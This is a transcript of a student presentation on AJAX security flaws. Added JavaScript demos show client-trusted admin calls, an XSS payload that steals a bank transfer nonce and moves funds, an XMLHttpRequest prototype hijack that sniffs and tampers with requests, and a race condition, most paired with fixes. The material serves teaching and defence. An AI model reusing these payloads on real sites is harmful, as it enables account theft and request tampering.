AJAX Security Issues, Kim Giglia, CSC 682

Posted 19-Jan-2016

TRANSCRIPT

Page 1

AJAX Security Issues

Kim Giglia

CSC 682

Page 2

Asynchronous JavaScript And XML (AJAX)

Not a new technology – a synergy of existing technologies:

• JavaScript
• DOM (Document Object Model)
• XML, JSON and XSLT
• DHTML, XHTML, and CSS
• XHR (XMLHttpRequest) object

Page 3

Traditional Web Application (diagram not included in the transcript)

Page 4

AJAX Web Application (diagram not included in the transcript)

Page 5

Security Issues – General

• Ajax applications are more complex
  • Hard to find knowledgeable developers
  • More lines of code, spread over more varied parts
• Ajax applications are transparent
  • Messages between client and server are plain HTTP and can be intercepted and understood by anyone who has the page
  • The application's endpoints are accessible to anyone, not only to the page's own script
  • Some application logic is stored on the client, where it can be read and changed

Page 6

Specific Security Issues

• XSS and CSRF
• XML poisoning
• Malicious Ajax code injection
• RSS/Atom injection
• WSDL scanning and enumeration
• Client-side validation routines
• Web services routing issues

Page 7

Specific Security Issues (continued)

• Parameter manipulation with SOAP
• XPath injection
• RIA client binary manipulation
• XSS prototype hijacking
• HTTP request splitting
• Mashup site security problems
• Aggregate or Ajax portal site problems
• Race conditions

Page 8

Why do issues arise?

• Tight deadlines
• Limited opportunity for training
• Pre-developed frameworks

Page 9

Specific Attacks Illustrated: Malicious Ajax Code Injection – Theoretical Attack

• Attacker sits on a public wireless connection
• Target: travel agency site HighTechVacations.net
• The agency keeps its coupon array and crypto functions on the client side – oops!
• The agency does not validate all client-side input used in queries and relies on client-side data transformation – oops!
• The agency stores both user and admin functions in a single common.js, including AjaxCalls.admin.addUser – oops!
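The three "oops" items above come down to one rule: the server must decide prices, discounts and authorization itself, because whatever common.js contains is known to every user. As an added example that is not from the slides, here is a constructed in-memory server in the HighTechVacations shape, handling a checkout and the admin.addUser call first the way the slide describes (trusting the discount the client computed and the client's claim to be an admin) and then with the checks done server-side. The names makeServer, checkout, the session table and the request shape are assumptions for the demo.

```javascript
// Added example (not from the slides). Constructed in-memory "server" with two
// Ajax endpoints: "checkout" (applies a coupon) and "admin.addUser". Names and
// request shape are assumptions for the demo.
function makeServer() {
  // Server-side copies of what the slide's site shipped to the client.
  const coupons = new Map([["SUMMER10", 0.10], ["STAFF50", 0.50]]);
  const users = new Set(["alice"]);
  // Sessions are server state; the role lives here, never in the request.
  const sessions = new Map([
    ["s-alice", { user: "alice", role: "customer" }],
    ["s-root",  { user: "root",  role: "admin" }],
  ]);

  // VULNERABLE: trusts values the client computed or asserted. Anyone who read
  // common.js knows the coupon table, the discount math and the admin call.
  function vulnerable(req) {
    if (req.method === "admin.addUser") {
      if (!req.params.isAdmin) return { status: 403 };      // client-supplied flag
      users.add(req.params.name);
      return { status: 200 };
    }
    if (req.method === "checkout") {
      // the client already "validated" the coupon and sends the resulting discount
      const total = Math.round(req.params.price * (1 - req.params.discount));
      return { status: 200, total };
    }
    return { status: 404 };
  }

  // HARDENED: authorization from the server-side session, every input
  // re-validated, and the discount derived from the coupon code on the server.
  function hardened(req) {
    const session = sessions.get(req.sessionId);
    if (!session) return { status: 401 };
    if (req.method === "admin.addUser") {
      if (session.role !== "admin") return { status: 403 };
      const name = req.params.name;
      if (typeof name !== "string" || !/^[a-z0-9_]{3,32}$/.test(name)) return { status: 400 };
      users.add(name);
      return { status: 200 };
    }
    if (req.method === "checkout") {
      const price = Number(req.params.price);
      if (!Number.isFinite(price) || price <= 0) return { status: 400 };
      const discount = coupons.get(req.params.coupon) ?? 0;   // client's discount field ignored
      return { status: 200, total: Math.round(price * (1 - discount)) };
    }
    return { status: 404 };
  }
  return { vulnerable, hardened, users };
}

// Constructed requests: what someone who read common.js sends, with an
// ordinary customer session, a forged admin flag and a made-up discount.
const forgedAdmin = { sessionId: "s-alice", method: "admin.addUser",
                      params: { name: "mallory", isAdmin: true } };
const forgedCheckout = { sessionId: "s-alice", method: "checkout",
                         params: { price: 1000, coupon: "BOGUS", discount: 0.99 } };

function demo() {
  const v = makeServer(), h = makeServer();
  return {
    vulnAdmin: v.vulnerable(forgedAdmin).status,       // 200: mallory created
    vulnTotal: v.vulnerable(forgedCheckout).total,     // 10: 99% off a $1000 trip
    hardAdmin: h.hardened(forgedAdmin).status,         // 403
    hardTotal: h.hardened(forgedCheckout).total,       // 1000: unknown coupon, full price
  };
}
console.log(demo());
```

The hardened handler never looks at isAdmin or discount at all; the client may still run the coupon check for a quick UI response, but the server repeats it on data it owns.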

Page 10

Specific Attacks Illustrated: XSS and CSRF – Theoretical Attack

• Attacker on a public wireless connection finds an XSS vulnerability on bank.com
• Attacker crafts a URL pointing at the real bank.com site but carrying a JavaScript payload in the query string
• Attacker e-mails the link to bank.com customers and asks them to come check out the new website
• User follows the link and logs in – the payload now has the user id and password
• The loaded JavaScript uses the XHR object to request the account balance

Page 11

Specific Attacks Illustrated: XSS and CSRF – Theoretical Attack (continued)

• After the balance is extracted, the XHR object is used to request a transfer of funds
• The bank requires confirmation of the transfer – the XHR object reads the randomized token (nonce) out of the confirmation page and submits it – funds transfer
• Remember the user never sees any activity, because the DOM is not updated
• This type of CSRF was not possible before Ajax: a cross-site attacker could make the browser send requests but could not read the responses, so the nonce stayed secret and only blind attacks were possible. Script injected into bank.com's own origin can read every XHR response, so the nonce gives no protection against it.
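The exchange on the two slides above, as an added example that is not part of the original presentation: a constructed in-memory bank whose transfer needs a nonce from a confirmation page, the injected script running with bank.com's cookies and reading each response, and for contrast a cross-site (blind) attacker who can send but not read. makeBank, the /balance, /transfer and /confirm paths, the cookie names and the account balances are all assumptions for the demo; in a browser the xhr function would be a same-origin XMLHttpRequest.

```javascript
// Added example (not from the slides). Constructed in-memory bank with an
// anti-CSRF nonce on transfers. Paths, cookies and balances are assumptions.
function makeBank() {
  const accounts = { alice: 5000, mallory: 0 };
  const sessions = new Map([["cookie-alice", "alice"]]);   // session cookie -> user
  const pending = new Map();                               // user -> {nonce, to, amount}

  // Random nonce; Math.random fallback is only for old runtimes without WebCrypto.
  const newNonce = () => (globalThis.crypto && globalThis.crypto.randomUUID)
    ? globalThis.crypto.randomUUID()
    : Math.random().toString(16).slice(2);

  // Every handler takes the cookie the browser attached; no cookie, no access.
  function request(method, path, body, cookie) {
    const user = sessions.get(cookie);
    if (!user) return { status: 401, html: "" };

    if (method === "GET" && path === "/balance")
      return { status: 200, html: `<p id="bal">Balance: ${accounts[user]}</p>` };

    if (method === "POST" && path === "/transfer") {
      const nonce = newNonce();
      pending.set(user, { nonce, to: body.to, amount: Number(body.amount) });
      // The confirmation page carries the nonce in a hidden field: the classic CSRF defence.
      return { status: 200,
               html: `<form action="/confirm"><input type="hidden" name="nonce" value="${nonce}"></form>` };
    }

    if (method === "POST" && path === "/confirm") {
      const p = pending.get(user);
      if (!p || body.nonce !== p.nonce) return { status: 403, html: "bad nonce" };
      pending.delete(user);
      if (!(p.to in accounts) || !(p.amount > 0) || p.amount > accounts[user])
        return { status: 400, html: "rejected" };
      accounts[user] -= p.amount;
      accounts[p.to] += p.amount;
      return { status: 200, html: "transferred" };
    }
    return { status: 404, html: "" };
  }
  return { accounts, request };
}

// What the injected script gets: an XHR bound to the victim's origin and cookies.
// It can send requests AND read the responses, which is the slide's point.
function sameOriginXhr(bank, cookie) {
  return (method, path, body) => bank.request(method, path, body, cookie);
}

// The payload: read the balance, request a transfer, lift the nonce out of the
// confirmation page, confirm. Nothing touches the DOM, so the victim sees nothing.
function xssPayload(xhr, attackerAccount) {
  const balance = Number(/Balance: (\d+)/.exec(xhr("GET", "/balance", null).html)[1]);
  const page = xhr("POST", "/transfer", { to: attackerAccount, amount: balance }).html;
  const nonce = /name="nonce" value="([^"]+)"/.exec(page)[1];
  return xhr("POST", "/confirm", { nonce }).status === 200 ? balance : 0;
}

// Pre-Ajax / cross-site CSRF: the attacker's page can make the browser submit a
// form with the victim's cookie, but cannot read the response, so the nonce is
// never seen and the confirmation can only be guessed.
function blindCsrf(bank, cookie, attackerAccount) {
  bank.request("POST", "/transfer", { to: attackerAccount, amount: 100 }, cookie); // response unreadable
  return bank.request("POST", "/confirm", { nonce: "guess" }, cookie).status === 200;
}

function demo() {
  const xssBank = makeBank();
  const stolen = xssPayload(sameOriginXhr(xssBank, "cookie-alice"), "mallory");
  const csrfBank = makeBank();
  const blindWorked = blindCsrf(csrfBank, "cookie-alice", "mallory");
  return { stolen, aliceAfterXss: xssBank.accounts.alice,
           blindWorked, aliceAfterBlind: csrfBank.accounts.alice };
}
console.log(demo());   // { stolen: 5000, aliceAfterXss: 0, blindWorked: false, aliceAfterBlind: 5000 }
```

The nonce does its job against the blind attacker and is irrelevant to the in-origin one; the only fix for the second case is removing the XSS that put the script there.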

Page 12

Specific Attacks Illustrated: XSS and CSRF – Real Attack

Samy worm on myspace.com

• Samy inserted JavaScript into his profile
• The worm redirects the browser to view the page from www.myspace.com instead of profile.myspace.com, so its XHR calls are same-origin
• It uses the XHR object to retrieve and modify the viewer's friends list and user profile
• The site asks for confirmation of the profile update – the XHR object is used to extract the token from the confirmation page and confirm

Page 13

Specific Attacks Illustrated: XSS Prototype Hijacking

• Wrapper function for the XHR object:

  var xmlhttp = XMLHttpRequest;   // keep a reference to the real constructor
  XMLHttpRequest = function( ) { this.xml = new xmlhttp(); return this; };   // every new XMLHttpRequest() now returns the wrapper, holding a real instance in .xml

• The attacker now controls the xml attribute, i.e. the real request object the page thinks it is using
• The attacker sets up a sniff() function that sends the victim's data to the attacker's site
• Finally the attacker wraps the XHR send() function so that it calls sniff() and maybe even tampers with the parameters sent to the real site
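The wrapper above, carried through to a working hijack, as an added example that is not from the slides. Node has no XMLHttpRequest, so the block first installs a constructed stand-in for the browser's native object (it writes each request to a server log and answers synchronously); the attacker's script then replaces the constructor exactly as the slide does and adds open() and send() wrappers that sniff and tamper; the page's own transfer() code is unchanged and never notices. The stand-in, the "mallory" substitution and the xhrLooksHijacked check are assumptions for the demo.

```javascript
// Added example (not from the slides). Constructed stand-in for the browser's
// native XMLHttpRequest: delivers the request to a server log, answers at once.
const serverLog = [];
class NativeXHR {
  open(method, url) { this.method = method; this.url = url; }
  send(body) {
    serverLog.push({ method: this.method, url: this.url, body });
    this.readyState = 4; this.status = 200; this.responseText = "ok:" + this.url;
    if (this.onreadystatechange) this.onreadystatechange();
  }
}
globalThis.XMLHttpRequest = NativeXHR;

// Reference captured by the page's first script, before any injected code ran.
// Comparing against it is the only cheap way for page code to notice a swap,
// and it only works if the page's script really did run first.
const pristineXHR = globalThis.XMLHttpRequest;
function xhrLooksHijacked() { return globalThis.XMLHttpRequest !== pristineXHR; }

// ---- attacker's injected script: the slide's wrapper, completed ----
const stolen = [];                       // what sniff() would ship to the attacker's site
function sniff(entry) { stolen.push(entry); }

function hijackXhr() {
  const xmlhttp = globalThis.XMLHttpRequest;            // the real constructor
  globalThis.XMLHttpRequest = function () {             // the slide's wrapper
    this.xml = new xmlhttp();
    return this;
  };
  const proto = globalThis.XMLHttpRequest.prototype;
  proto.open = function (method, url, async, user, pw) {
    this.method = method; this.url = url;
    return this.xml.open(method, url, async, user, pw);
  };
  proto.send = function (body) {
    sniff({ method: this.method, url: this.url, body });            // leak what the page sends
    const tampered = typeof body === "string"
      ? body.replace(/(^|&)to=[^&]*/, "$1to=mallory") : body;     // and change the payee
    const self = this;
    this.xml.onreadystatechange = function () {         // relay state to the page's handler
      self.readyState = this.readyState; self.status = this.status;
      self.responseText = this.responseText;
      if (self.onreadystatechange) self.onreadystatechange();
    };
    return this.xml.send(tampered);
  };
}

// ---- the page's own code, written against the normal XHR API ----
function transfer(to, amount) {
  const xhr = new XMLHttpRequest();
  let reply = null;
  xhr.onreadystatechange = function () { if (xhr.readyState === 4) reply = xhr.responseText; };
  xhr.open("POST", "/transfer", true);
  xhr.send("to=" + to + "&amount=" + amount);
  return reply;
}

function demo() {
  const last = () => serverLog[serverLog.length - 1].body;
  const before = { hijacked: xhrLooksHijacked(), reply: transfer("bob", 100), server: last() };
  hijackXhr();                                           // the XSS payload runs
  const after = { hijacked: xhrLooksHijacked(), reply: transfer("bob", 100), server: last(),
                  stolen: stolen[stolen.length - 1].body };
  return { before, after };
}
const result = demo();
console.log(result);
```

After the hijack the page still receives "ok:/transfer" and its handler fires normally; only the server log shows the payee changed and only the attacker's log shows the original form body.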

Page 14

Specific Attacks Illustrated: Aggregate Sites (diagram not included in the transcript)

Page 15

Specific Attacks Illustrated: Aggregate Sites

• Data is aggregated from multiple untrustworthy sites
• Everything runs in the same security domain (origin)
• IFrame jails can be used, but a jail can still be escaped: content inside one jail adds a new iframe that points to another iframe outside the jail
• NetVibes.com specifically allows widgets to POST to /save/userData.php – so unless the iframe jail is extended to the server, there is no protection
• Session hijacking is possible if code in an iframe jail can access the session ID

Page 17

Not an attack – still a problem: race conditions

• Alice has direct deposit and banks online
• Alice transfers $2k from savings to checking online
• Simultaneously her direct deposit of $10k is being credited
• Before the transfer and the direct deposit her checking balance was $2k
• After both execute her checking balance is $4k – what?!@%&?
• A race condition has occurred: both operations read the $2k balance, and the transfer's write landed last, so only the $2k transfer's update survived and the $10k deposit was overwritten. The web app developers failed to account for concurrent updates from other processes.
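Alice's lost update, as an added example that is not from the slides: each operation is a read-compute-write with the round trip between read and write modelled as a generator yield, and a small scheduler runs the two operations in a chosen interleaving. The naive version reproduces the $4k result; the fixed version makes the write a compare-and-set on a version counter and retries when someone else wrote in between. makeAccount, the version field and runSchedule are assumptions for the demo; in a real store the check-and-write would be one atomic statement (a conditional UPDATE or a transaction with row locking).

```javascript
// Added example (not from the slides). Constructed in-memory account; balances
// in whole dollars. The version counter exists only for the fixed variant.
function makeAccount(balance) { return { balance, version: 0 }; }

// Lost-update pattern: read, then write, with the I/O gap between them as a
// `yield`. Whoever runs in the gap is invisible to this writer.
function* naiveAdd(account, delta) {
  const seen = account.balance;        // read
  yield;                               // DB round trip; the other process runs here
  account.balance = seen + delta;      // write, clobbering anything written meanwhile
  return true;
}

// Optimistic fix: re-check the version at write time; if another writer got in
// first, re-read and retry. In a real store the check and write are one atomic op.
function* casAdd(account, delta) {
  for (;;) {
    const seenBalance = account.balance, seenVersion = account.version;
    yield;
    if (account.version === seenVersion) {
      account.balance = seenBalance + delta;
      account.version++;
      return true;
    }
  }
}

// Advance the operations in the given order, one step each time an index appears.
// Returns false if some operation never reached its end.
function runSchedule(ops, order) {
  const done = ops.map(() => false);
  for (const i of order) {
    if (done[i]) continue;
    if (ops[i].next().done) done[i] = true;
  }
  return done.every(Boolean);
}

// The slide's scenario: checking starts at $2k; transfer (+$2k) and deposit
// (+$10k) both read before either writes, and the transfer writes last.
function aliceLostUpdate() {
  const checking = makeAccount(2000);
  runSchedule([naiveAdd(checking, 2000), naiveAdd(checking, 10000)], [0, 1, 1, 0]);
  return checking.balance;   // 4000: the deposit's write was overwritten
}

// Same interleaving with compare-and-set: the transfer notices the version
// moved, re-reads $12k and writes $14k.
function aliceWithCas() {
  const checking = makeAccount(2000);
  runSchedule([casAdd(checking, 2000), casAdd(checking, 10000)], [0, 1, 1, 0, 0]);
  return checking.balance;   // 14000
}

console.log({ naive: aliceLostUpdate(), cas: aliceWithCas() });
```

Changing the order array to [0, 0, 1, 1] (no overlap) makes the naive version correct too, which is exactly why such bugs survive testing: they only show under the interleaving that production eventually produces.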

Page 18

Solutions to Security Issues – General recommendations

• Developer training and secure coding practices
• Specifically, validate all data input on the server
• Get corporate management buy-in to foster a secure development environment

Page 19

Solutions to Security Issues – Specific solutions

• Code migration framework to Ajax
  • Develop in Java
    • Access to a strong IDE
    • Developers are more familiar with Java than with JavaScript
    • Use static/dynamic analysis to catch vulnerabilities
  • Use XMLVM and XSL style sheet mappings to convert the Java automatically to JavaScript
  • A prototype program was developed to test feasibility
  • This approach cannot support multi-threaded apps

Page 20

Solutions to Security Issues – Specific solutions

• Automatic partitioning
  • Code in Jif 3.0, so the developer focuses on one language
  • Jif code is compiled into WebIL
  • The compiler separates the code into two programs, client and server, according to the security constraints (labels) in the source
  • Both programs are compiled into Java
  • GWT transforms the client-side program into JavaScript
  • Six small prototype apps were tested – no real-world apps
  • Security labels take getting used to

Page 21

Solutions to Security Issues – Specific solutions

• Construction frameworks to protect against injection
  • An extension of the same-origin policy
  • Identify every UI widget as a principal
  • Sandbox each principal with respect to JavaScript
  • Modify the browser to collect the list of principals as it walks the DOM tree
  • Modify the development framework to attach principal annotations when HTML is generated
  • Problems handling UIs that depend on other UIs
  • No testing submitted by the authors

Page 22

Solutions to Security Issues – Specific solutions

• BrowserShield
  • Rewrites web pages to filter out malicious content
  • THTML: tokenizes the HTML and modifies it according to security policies; tags script elements with bshield.translate()
  • TSCRIPT: rewrites all JavaScript at runtime according to the policies and feeds it through the interposition layer
  • The interposition layer controls all DOM manipulations

Page 23

Solutions to Security Issues – Specific solutions (diagram not included in the transcript)

Page 24

Solutions to Security Issues – Specific solutions

• BrowserShield
  • The authors built a prototype and tested it against all critical vulnerabilities for which IE released patches in 2005
  • 12 of those vulnerabilities related to HTML, script, and ActiveX – 100% of them caught by BrowserShield

Page 25

Conclusions

• Developing secure Ajax applications is a work in progress
• Continued developer education and awareness is needed
• Some changes in corporate culture may have to happen
• If Ajax applications are developed willy-nilly and people are attacked, they may decide to stop using the web – this could stifle certain industries
• Above all, developers should scrub data inputs on the server, never trusting what the client has already checked